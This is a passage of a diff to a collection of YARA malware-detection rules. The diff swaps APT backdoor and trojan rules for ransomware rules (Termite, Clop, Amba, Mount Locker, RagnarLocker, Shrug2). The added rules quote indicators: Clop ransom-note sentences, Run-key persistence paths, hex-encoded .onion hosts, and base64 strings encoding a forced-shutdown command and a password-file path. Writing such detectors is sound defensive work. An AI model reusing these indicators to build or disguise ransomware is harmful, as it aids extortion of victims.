B????89????E8????????EB??C7????????????E8????????8B????3B????0F92??83??????84??75??E9????????8B????8D????89????8B??0FBE??89????E8????????E9????????C7????????????EB??C7????????????EB??C7????????????EB??C7????????????EB??0FBE????89????E8????????E9????????8B????83????85??74??8B????8D????89????8B??EB??80??????75??8B????8D????89????8B??EB??8B????8D????89????8B??89????80??????75??8B????85??79??F7????83??????C7????????????8B????BA????????F7????89??88????8B????BA????????F7????89????80??????7E??80??????75??B8????????EB??B8????????0FB6????01??88????8B????0FB6????83????88??????83??????83??????74??83??????76??8B????83????85??74??8B????C6????????83??????8B????89????8B????83????84??74??B8????????EB??B8????????88????EB??0FBE????89????E8????????8B????83????85??75??8B????3B????0F92??83??????84??75??83??????8B????0FB6??????0FBE??89????E8????????83??????75??EB??C7????????????E8????????8B????3B????0F92??83??????84??75??E9????????E9????????90EB??90C9C35589??83????8D????89????8B????89??????8B????89????E8????????C9C35589??83????8B????8B????88????88????C9C35589??57565381??????????8B????8B????88??????????88??????????C7??????????????????C7??????????????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????89??????????0FB6??????????C7??????????????C7??????????????8B????89??????89????E8????????66????????????8D??????????BA????????89??????C7??????????????89????E8????????83????????????0F84????????83????????????0F84????????8B??????????89????E8????????3D????????0F8F????????8B??????????89????E8????????83????0F8F????????8B??????????89????E8????????83????0F8F????????C7??????????????????EB??8B??????????03??????????0FB6??3C??7E??8B??????????03??????????0FB6??3C??7F??8B??????????03??????????8B??????????03??????????0FB6??83????88??8B??????????83????89??????????8B??????????89????E8????????8B??????????39??7F??81??????????????????7E??C7??????????????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????C7????????????E8????????8B??????????C7??????????????89????E8????????89??????????C7??????????????????E9????????8B??????????69??????????03??????????C6??????8B??????????69??????????03??????????C7??????????8B??????????69??????????89??03??????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????8B????89????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????0FB6??????????3C??74??8B??????????69??????????03??????????05????????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????69??????????03??????????81??????????83????89??????89??????89????E8????????8B??????????69??????????03??????????C6????????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????8B??????????69??????????03??????????8D??????????8B??????????89??????89????E8????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????0FB6????3C??0F87????????8B??????????69??????????89??03??????????0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????8B????89????E8????????89??E8????????89??0FB6??????????8B??????????89??C1????F7??89??89??89??01??01??C1????03????0FB6????0FB6??89??89??D3??89??8D????89????E8????????89????E8????????89??BA????????89??F7??89??C1????89??C1????01??89??29??83????0F87????????8B????????????FF??C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7????????????E8????????E9????????C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7????????????E8????????E9????????C7????????????E8????????C7??????????????C7????????????E8????????8B??????????69??????????03??????????83????89??????89????E8????????C7???????????? }
+		$sq0 = { 92 93 a91c2ea521 59 334826 }
+		$sq1 = { d0ce 6641 c1e9c0 41 80f652 49 c1f94d }
+		$sq2 = { 80f8b5 4d 63c9 f9 4d 03d9 41 }
+		$sq3 = { 34b7 d2ea 660fbafa56 0f99c2 32d8 660fbafaed 99 }
+		$sq4 = { f9 f7c70012355f 35c01f5226 f9 8d8056c800b0 f6c4b2 f9 }
+		$sq5 = { f5 f9 44 3aeb 45 33cd 41 }
+		$sq6 = { 890f c0ff12 44 b4a3 ee 2b4e70 7361 }
+		$sq7 = { 81c502000000 6689542500 6681d97a1e 660fabe1 660fbae1a5 8b0f 8dbf04000000 }
+		$sq8 = { 8d13 de11 d7 677846 f1 0d8cd45f87 bb34b98f33 }
+		$sq9 = { 1440 4b 41 e8???????? 397c0847 }
 
 	condition:
-		uint16( 0 ) == 0x457f and filesize < 3000KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 21000KB and 7 of them
 }
-
-rule TRELLIX_ARC_APT_Stolen_Certificates : BACKDOOR FILE
+rule TRELLIX_ARC_Termite_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect samples digitally signed from these stolen certificates"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "57051977-780c-5c8e-bc66-0f1d8b3bbd93"
-		date = "2020-04-17"
-		modified = "2020-08-14"
-		reference = "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-decade-of-the-rats.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_decade_of_RATs.yar#L196-L221"
+		description = "Rule to detect the Termite Ransomware"
+		author = "McAfee ATR Team"
+		id = "521ec8ee-a54c-57c3-9437-a2ef7f8ed4ca"
+		date = "2018-08-28"
+		modified = "2020-10-12"
+		reference = "https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-august-31st-2018-devs-on-vacation/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_termite.yar#L1-L32"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "ce3424524fd1f482a0339a3f92e440532cff97c104769837fa6ae52869013558"
-		logic_hash = "9b700e4889349d0203bdd4e00035ee9c9aba5025ccc57eef915b2c78996f8160"
+		hash = "021ca4692d3a721af510f294326a31780d6f8fcd9be2046d1c2a0902a7d58133"
+		logic_hash = "e5c01e8377957fa25cf6c2031c2680e802b0082a36f50b97b4e488c5bf40e968"
 		score = 75
-		quality = 70
-		tags = "BACKDOOR, FILE"
+		quality = 20
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Pwnlnx"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Termite"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
+	strings:
+		$s1 = "C:\\Windows\\SysNative\\mswsock.dll" fullword ascii
+		$s2 = "C:\\Windows\\SysWOW64\\mswsock.dll" fullword ascii
+		$s3 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Termite.exe" fullword ascii
+		$s4 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\Payment.exe" fullword ascii
+		$s5 = "C:\\Windows\\Termite.exe" fullword ascii
+		$s6 = "\\Shell\\Open\\Command\\" fullword ascii
+		$s7 = "t314.520@qq.com" fullword ascii
+		$s8 = "(*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR)|*.JPG;*.PNG;*.BMP;*.GIF;*.ICO;*.CUR|JPG" fullword ascii
+
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" and pe.signatures [ i ] . serial == "3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a" or pe.signatures [ i ] . subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" and pe.signatures [ i ] . serial == "3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a" or pe.signatures [ i ] . subject contains "/C=KR/ST=Seoul/L=Gangnam-gu/O=LivePlex Corp/CN=LivePlex Corp" or pe.signatures [ i ] . serial == "3f:55:42:e2:e7:1d:8d:b3:57:04:1c:9d:d4:5b:95:0a" )
+		( uint16( 0 ) == 0x5a4d and filesize < 6000KB ) and all of them
 }
-rule TRELLIX_ARC_Apt_Aurora_Pdb_Samples : BACKDOOR FILE
+rule TRELLIX_ARC_Clop_Ransom_Note : RANSOMWARE FILE
 {
 	meta:
-		description = "Aurora APT Malware 2006-2010"
+		description = "Rule to detect Clop Ransomware Note"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "51b080b7-671b-592b-ba52-7fdd0ddf0294"
-		date = "2010-01-11"
+		id = "b18e4d4d-aa38-5009-a31b-ed038c5bd4f9"
+		date = "2019-08-01"
 		modified = "2020-08-14"
-		reference = "https://en.wikipedia.org/wiki/Operation_Aurora"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_operation_aurora.yar#L1-L26"
+		reference = "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clop-ransomware/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_ClopRansomNote.yar#L1-L34"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "ce7debbcf1ca3a390083fe5753f231e632017ca041dfa662ad56095a500f2364"
-		logic_hash = "5791ae7b96f2b59d0cca1ab97455bb4745edad8980ac4aff22aa36e0bc4f240e"
+		logic_hash = "a90862e9dc59b1a8f38b777b4f529d5de740d0f49175813cae64f10ca9677826"
 		score = 75
 		quality = 70
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:W32/Aurora"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Clop"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pdb = "\\AuroraVNC\\VedioDriver\\Release\\VedioDriver.pdb"
-		$pdb1 = "\\Aurora_Src\\AuroraVNC\\Avc\\Release\\AVC.pdb"
+		$s1 = "If you want to restore your files write to emails" fullword ascii
+		$s2 = "All files on each host in the network have been encrypted with a strong algorithm." fullword ascii
+		$s3 = "Shadow copies also removed, so F8 or any other methods may damage encrypted data but not recover." fullword ascii
+		$s4 = "You will receive decrypted samples and our conditions how to get the decoder." fullword ascii
+		$s5 = "DO NOT RENAME OR MOVE the encrypted and readme files." fullword ascii
+		$s6 = "(Less than 6 Mb each, non-archived and your files should not contain valuable information" fullword ascii
+		$s7 = "We exclusively have decryption software for your situation" fullword ascii
+		$s8 = "Do not rename encrypted files." fullword ascii
+		$s9 = "DO NOT DELETE readme files." fullword ascii
+		$s10 = "Nothing personal just business" fullword ascii
+		$s11 = "eqaltech.su" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 150KB and any of them
+		( uint16( 0 ) == 0x6f59 ) and filesize < 10KB and all of them
 }
-
-rule TRELLIX_ARC_Milum_Trojan : TROJAN FILE
+rule TRELLIX_ARC_Amba_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect Milum trojan from the Wildpressure operation"
+		description = "Rule to detect Amba Ransomware"
 		author = "Marc Rivero | McAfee ATR Team"
-		id = "acc56237-a93a-55c0-a90c-11ca1da683db"
-		date = "2020-04-24"
+		id = "961f2892-e462-55e4-bd96-7dff895cb1e6"
+		date = "2017-07-03"
 		modified = "2020-08-14"
-		reference = "https://securelist.com/wildpressure-targets-industrial-in-the-middle-east/96360/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_milum_wildpressure.yar#L3-L28"
+		reference = "https://www.enigmasoftware.com/ambaransomware-removal/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_amba.yar#L1-L41"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "86456ebf6b807e8253faf1262e7a2b673131c80174f6133b253b2e5f0da442a9"
-		logic_hash = "3ab1ff129517cb4a829edac289c00d7701d6f667ba2ef5a28024fd01a3a52e8e"
+		hash = "b9b6045a45dd22fcaf2fc13d39eba46180d489cb4eb152c87568c2404aecac2f"
+		logic_hash = "0830ab49956711d3e6ad64785edcf54146a24756c4ab66384305dc18091867bd"
 		score = 75
-		quality = 70
-		tags = "TROJAN, FILE"
+		quality = 68
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/Milum"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/Amba"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$pattern = { 558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B????89??????????C7????????????8D????C7??????????33??6A??89??????????89????E8????????83????3B??0F84????????89????89??8B????89????8B????89????8B????C6??????8B????C6??????C6??????8B??????????BE????????89????89????88????C6??????6A??68????????8D??????????89??????????89??????????88??????????E8????????C6??????6A??538D????528D??????????89??????????89??????????88??????????E8????????C6??????8D??????????508B??E8????????508D??????????5157E8????????C6??????83????????????72??8B??????????52E8????????83????89??????????89??????????88??????????C6??????83????????????72??8B??????????50E8????????83????6A??68????????8D????89??????????89??????????88??????????89????89????88????E8????????C6??????6A??538D????518D????89????89????88????E8????????C6??????8D????528B??E8????????508D??????????5057E8????????C6??????83??????72??8B????51E8????????83????89????89????88????C6??????83??????72??8B????52E8????????83????6A??68????????8D????89????89????88????89????89????88????E8????????C6??????6A??538D????508D????89????89????88????E8????????C6??????83????8B??89??????????6A??89????89????68????????88??E8????????C6??????83????8B??89??????????6A??538D????89????89????5288??E8????????C6??????8D??????????50C6??????E8????????83????C6??????8B??????????2B??????????B8????????F7??03??C1????8B??C1????03??83????75??8B??????????6A??53528D????E8????????8B??????????6A??83????53508D????E8????????6A??538D????508D????89????89????88????E8????????C6??????6A??538D????518D????89????89????88????E8????????C6??????8D????528B??E8????????508D??????????5057E8????????C6??????BF????????39????72??8B????51E8????????83????89????89????88????C6??????39????72??8B????52E8????????83????89????89????88????C6??????8B??????????3B??74??8B??????????E8????????8B??????????50E8????????83????BF????????89??????????89??????????89??????????C6??????39????72??8B????51E8????????83????89????89????88????C6??????39????72??8B????52E8????????83????89????89????88????C6??????39????72??8B????50E8????????83????89????89????88????88????39????72??8B????51E8????????83????89????89????88????C7????????????39????72??8B????52E8????????83????8B??????????89????89????88????8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????8D??????????508D??????????89??????????E8????????C6??????C7??????????????????C6??????68????????8D??????????51E8????????CCCC558B??6A??68????????64??????????5051535657A1????????33??508D????64??????????8B????C7??????????C7????????????8D????33??83??????89????72??8B??EB??8B??8D????88??8B????8B????518B??E8????????8B????89????8B????89??8B????89????89????88????83??????72??8B??50E8????????83????89????C7????????????88??83????89????89????C7????????????8B????8B??50518D????E8????????89????8B????52E8????????83????8B????64????????????595F5E5B8B??5DC2????CCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????505156A1????????33??508D????64??????????83????C7????????????8B????5156E8????????C7????????????C7????????????8B??8B????64????????????595E8B??5DC2????CCCCCCCCCCCC558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B????33??8B??89??????????8B????8B??89??????????89??????????89??????????3B??0F84????????8D????39??????????0F85????????68????????8D????5750E8????????C7????????????83????8D????57518B??E8????????83????C6??????8B??????????6A??535083????E8????????C6??????BF????????39????72??8B????52E8????????83????C7????????????89????88????88????39????72??8B????50E8????????83????C7????????????89????88????E9????????578D????68????????51E8????????C7????????????508D??????????52BA????????E8????????C6??????83????8D????57518B??E8????????83????C6??????8B??????????6A??535083????E8????????C6??????BF????????39????72??8B????52E8????????83????C7????????????89????88????C6??????39??????????72??8B??????????50E8????????83????C7??????????????????89??????????88??????????88????39????72??8B????51E8????????83????C7????????????89????88????FF??????????38????75??8B????38????75??8B??8B??38????75??8D????8B??8B??38????74??EB??8B????38????75??3B????75??8B??8B????38????74??8B??8B??????????3B????0F85????????8B??????????8B??6A??5383????C7????????????89????508B??88??E8????????89????C7??????????????????8B??8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????CCCCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????50515356A1????????33??508D????64??????????8B??89????C7??????????33??89????83??????72??8B????50E8????????83????C7????????????89????88????C7????????????83??????72??8B????50E8????????83????C7????????????89????88????8B????64????????????595E5B8B??5DC3CCCCCCCCCC558B??6A??68????????64??????????5083????A1????????33??89????5356508D????64??????????33??89????538B??68????????8D????89????C7????????????89????88????E8????????C7????????????6A??8D????38????74??68????????EB??68????????E8????????8D????5083????8D????5651E8????????C6??????8D????52578B??E8????????83????C7????????????C6??????BE????????39????72??8B????50E8????????83????C7????????????89????88????88????39????72??8B????51E8????????83????C7????????????89????88????8B??8B????64????????????595E5B8B????33??E8????????8B??5DC3CCCCCCCCCCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????50515356A1????????33??508D????64??????????8B??89????C7??????????33??89????83??????72??8B????50E8????????83????C7????????????89????88????C7????????????83??????72??8B????50E8????????83????F6??????C7????????????89????88????74??56E8????????83????8B??8B????64????????????595E5B8B??5DC2????CCCC558B??6A??68????????64??????????50A1????????33??508D????64??????????C7????????????6A??6A??8D????5083????E8????????C7????????????83??????72??8B????51E8????????83????C7????????????C7????????????C6??????8B????64????????????598B??5DC2????CCCCCCCCCCCCCCCCCCCCCC558B??6A??68????????64??????????5083????A1????????33??89????535657508D????64??????????33??89????8B????89????89????B8????????89????C7????????????89????88??89????8D????BF????????39????72??8B??8B????39????73??8D????8B????518D????518B??E8????????C6??????508B??E8????????C6??????39????72??8B????52E8????????83????C7????????????89????88????88????39????72??8B????50E8????????83????C7????????????89????88????8B??8B????64????????????595F5E5B8B????33??E8????????8B??5DC2????CCCCCCCCCCCCCCCC558B??6A??68????????64??????????5081??????????A1????????33??89????535657508D????64??????????8B??33??89????8B????89??????????89?????????? }
+		$s1 = "64DCRYPT.SYS" fullword wide
+		$s2 = "32DCRYPT.SYS" fullword wide
+		$s3 = "64DCINST.EXE" fullword wide
+		$s4 = "32DCINST.EXE" fullword wide
+		$s5 = "32DCCON.EXE" fullword wide
+		$s6 = "64DCCON.EXE" fullword wide
+		$s8 = "32DCAPI.DLL" fullword wide
+		$s9 = "64DCAPI.DLL" fullword wide
+		$s10 = "ICYgc2h1dGRvd24gL2YgL3IgL3QgMA==" fullword ascii
+		$s11 = "QzpcVXNlcnNcQUJDRFxuZXRwYXNzLnR4dA==" fullword ascii
+		$s12 = ")!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v))!pssx}v!pssx}v)" fullword ascii
+		$s13 = "RGVmcmFnbWVudFNlcnZpY2U="
+		$s14 = "LWVuY3J5cHQgcHQ5IC1wIA=="
+		$s15 = "LWVuY3J5cHQgcHQ3IC1wIA=="
+		$s16 = "LWVuY3J5cHQgcHQ2IC1wIA=="
+		$s17 = "LWVuY3J5cHQgcHQzIC1wIA=="
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 2000KB and pe.imphash ( ) == "548d9f5f1e74f34b85612667335d41f2" and all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 8 of them ) ) or ( all of them )
 }
-rule TRELLIX_ARC_Apt_Manitsme_Trojan : TROJAN FILE
+rule TRELLIX_ARC_RANSOM_Mountlocker : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the Manitsme trojan"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "49e0c934-6920-5e49-837c-27ebbbd5a1a2"
-		date = "2013-03-08"
-		modified = "2020-08-14"
-		reference = "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_manitsme_trojan_pdb.yar#L1-L36"
+		description = "Rule to detect Mount Locker ransomware"
+		author = "McAfee ATR Team"
+		id = "8451b78c-3cef-557a-a2e3-0767a0b0eddb"
+		date = "2020-09-25"
+		modified = "2020-10-12"
+		reference = "https://github.com/advanced-threat-research/Yara-Rules/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_mountlocker.yar#L1-L32"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		hash = "c1c0ea096ec4d36c1312171de2a9ebe258c588528a20dbb06a7e3cf97bf1e197"
-		logic_hash = "584053145249a930d3eae5e291d3553c57fa427dbecac9f04e7c0169f153b7af"
+		logic_hash = "fb332a6725b9276cca379dd3621943c69f88570fb317da27a857a2544d2aa4e0"
 		score = 75
-		quality = 70
-		tags = "TROJAN, FILE"
+		quality = 64
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "trojan"
-		malware_family = "Trojan:W32/Manitsme"
-		actor_type = "Apt"
+		malware_type = "ransomware"
+		malware_family = "Ransomware:W32/MountLocker"
+		actor_type = "Cybercrime"
 		actor_group = "Unknown"
+		hash1 = "4b917b60f4df6d6d08e895d179a22dcb7c38c6a6a6f39c96c3ded10368d86273"
+		hash2 = "f570d5b17671e6f3e56eae6ad87be3a6bbfac46c677e478618afd9f59bf35963"
 
 	strings:
-		$s1 = "SvcMain.dll" fullword ascii
-		$s2 = "rj.soft.misecure.com" fullword ascii
-		$s3 = "d:\\rouji\\SvcMain.pdb" fullword ascii
-		$s4 = "constructor or from DllMain." fullword ascii
-		$s5 = "Open File Error" fullword ascii
-		$s6 = "nRet == SOCKET_ERROR" fullword ascii
-		$s7 = "Oh,shit" fullword ascii
-		$s8 = "Paraing" fullword ascii
-		$s9 = "Hallelujah" fullword ascii
-		$s10 = "ComSpec" fullword ascii
-		$s11 = "ServiceMain" fullword ascii
-		$s12 = "SendTo(s,(char *)&sztop,sizeof(sztop),FILETYPE) == ERRTYPE" fullword ascii
+		$s1 = {63 69 64 3d 25 43 4c 49 45 4e 54 5f 49 44}
+		$s2 = {7a 73 61 33 77 78 76 62 62 37 67 76 36 35 77 6e 6c 37 6c 65 72 73 6c 65 65 33 63 37 69 32 37 6e 64 71 67 68 71 6d 36 6a 74 32 70 72 69 76 61 32 71 63 64 70 6f 6e 61 64 2e 6f 6e 69 6f 6e}
+		$s3 = {36 6d 6c 7a 61 68 6b 63 37 76 65 6a 79 74 70 70 62 71 68 71 6a 6f 75 34 69 70 66 74 67 73 33 67 69 7a 6f 66 32 78 34 7a 6b 6c 62 6c 6c 69 61 79 68 73 71 62 33 77 61 64 2e 6f 6e 69 6f 6e}
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( $s1 and $s2 ) or ( $s1 and $s3 ) or $s1
 }
-rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi : BACKDOOR FILE
+
+rule TRELLIX_ARC_Ragnarlocker_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the APT Derusbi ELF file"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "3b1c9644-7279-5e2c-8891-f03ca78cf3b7"
-		date = "2017-05-31"
-		modified = "2020-08-14"
-		reference = "https://attack.mitre.org/software/S0021/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Derusbi.yar#L1-L61"
+		description = "Rule to detect RagnarLocker samples"
+		author = "McAfee ATR Team"
+		id = "58874f27-3070-52c9-bd96-337fdaa4499b"
+		date = "2020-04-15"
+		modified = "2020-10-12"
+		reference = "https://www.bleepingcomputer.com/news/security/ragnar-locker-ransomware-targets-msp-enterprise-support-tools/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_ragnarlocker.yar#L3-L45"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "0a83566a0540d28d1cc0ebee01d29d15ddc86cabff9044fd8a198b847ba24c50"
+		hash = "9706a97ffa43a0258571def8912dc2b8bf1ee207676052ad1b9c16ca9953fc2c"
+		logic_hash = "2f31da9182a1b47fb1e7e4459461de4c496ec323ff13e622d3ce27ac8cce1912"
 		score = 75
 		quality = 68
-		tags = "BACKDOOR, FILE"
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:ELF/Derusbi"
+		malware_type = "ransomware"
+		malware_family = "Ransom:W32/RagnarLocker"
 		actor_type = "Cybercrime"
 		actor_group = "Unknown"
 
 	strings:
-		$s1 = "LxMain"
-		$s2 = "execve"
-		$s3 = "kill"
-		$s4 = "cp -a %s %s"
-		$s5 = "%s &"
-		$s6 = "dbus-daemon"
-		$s7 = "--noprofile"
-		$s8 = "--norc"
-		$s9 = "TERM=vt100"
-		$s10 = "/proc/%u/cmdline"
-		$s11 = "loadso"
-		$s12 = "/proc/self/exe"
-		$s13 = "Proxy-Connection: Keep-Alive"
-		$s14 = "Connection: Keep-Alive"
-		$s15 = "CONNECT %s"
-		$s16 = "HOST: %s:%d"
-		$s17 = "User-Agent: Mozilla/4.0"
-		$s18 = "Proxy-Authorization: Basic %s"
-		$s19 = "Server: Apache"
-		$s20 = "Proxy-Authenticate"
-		$s21 = "gettimeofday"
-		$s22 = "pthread_create"
-		$s23 = "pthread_join"
-		$s24 = "pthread_mutex_init"
-		$s25 = "pthread_mutex_destroy"
-		$s26 = "pthread_mutex_lock"
-		$s27 = "getsockopt"
-		$s28 = "socket"
-		$s29 = "setsockopt"
-		$s30 = "select"
-		$s31 = "bind"
-		$s32 = "shutdown"
-		$s33 = "listen"
-		$s34 = "opendir"
-		$s35 = "readdir"
-		$s36 = "closedir"
-		$s37 = "rename"
+		$s1 = {2D 2D 2D 52 41 47 4E 41 52 20 53 45 43 52 45 54 2D 2D 2D}
+		$s2 = { 66 ?? ?? ?? ?? ?? ?? 66 ?? ?? ?? B8 ?? ?? ?? ?? 0F 44 }
+		$s3 = { 5? 8B ?? 5? 5? 8B ?? ?? 8B ?? 85 ?? 0F 84 }
+		$s4 = { FF 1? ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 85 }
+		$s5 = { 8D ?? ?? ?? ?? ?? 5? FF 7? ?? E8 ?? ?? ?? ?? 85 ?? 0F 85 }
+		$op1 = { 0f 11 85 70 ff ff ff 8b b5 74 ff ff ff 0f 10 41 }
+		$p0 = { 72 eb fe ff 55 8b ec 81 ec 00 01 00 00 53 56 57 }
+		$p1 = { 60 be 00 00 41 00 8d be 00 10 ff ff 57 eb 0b 90 }
+		$bp0 = { e8 b7 d2 ff ff ff b6 84 }
+		$bp1 = { c7 85 7c ff ff ff 24 d2 00 00 8b 8d 7c ff ff ff }
+		$bp2 = { 8d 85 7c ff ff ff 89 85 64 ff ff ff 8d 4d 84 89 }
 
 	condition:
-		( uint32( 0 ) == 0x4464c457f ) and filesize < 200KB and all of them
+		uint16( 0 ) == 0x5a4d and filesize < 100KB and ( 4 of ( $s* ) and $op1 ) or all of ( $p* ) and pe.imphash ( ) == "9f611945f0fe0109fe728f39aad47024" or all of ( $bp* ) and pe.imphash ( ) == "489a2424d7a14a26bfcfb006de3cd226"
 }
-rule TRELLIX_ARC_Apt_Nix_Elf_Derusbi_Kernelmodule : BACKDOOR FILE
+rule TRELLIX_ARC_Shrug2_Ransomware : RANSOMWARE FILE
 {
 	meta:
-		description = "Rule to detect the Derusbi ELK Kernel module"
-		author = "Marc Rivero | McAfee ATR Team"
-		id = "1614a63d-c5d1-5ce1-a5b8-eb48325f60e6"
-		date = "2017-05-31"
-		modified = "2020-08-14"
-		reference = "https://attack.mitre.org/software/S0021/"
-		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/APT/APT_Derusbi.yar#L63-L105"
+		description = "Rule to detect the Shrug Ransomware"
+		author = "McAfee ATR Team"
+		id = "34e59296-db7c-551b-8d48-ffea20f2b4bb"
+		date = "2018-07-12"
+		modified = "2020-10-12"
+		reference = "https://blogs.quickheal.com/new-net-ransomware-shrug2/"
+		source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/ransomware/RANSOM_shrug2.yar#L1-L30"
 		license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/1919562a59f190bda60c982424f6a24c542ee3e0/LICENSE"
-		logic_hash = "0b86e96ef616e926f0d665e2bd013f2773461483176c68bd5e7c7d059ac13d78"
+		hash = "c89833833885bafdcfa1c6ee84d7dbcf2389b85d7282a6d5747da22138bd5c59"
+		logic_hash = "8c817b7fc4a0eada08b3d298c94b99a85c4e5a49a49d1c3fabdb0c6bbf56676b"
 		score = 75
-		quality = 70
-		tags = "BACKDOOR, FILE"
+		quality = 20
+		tags = "RANSOMWARE, FILE"
 		rule_version = "v1"
-		malware_type = "backdoor"
-		malware_family = "Backdoor:ELF/Derusbi"
+		malware_type = "ransomware"
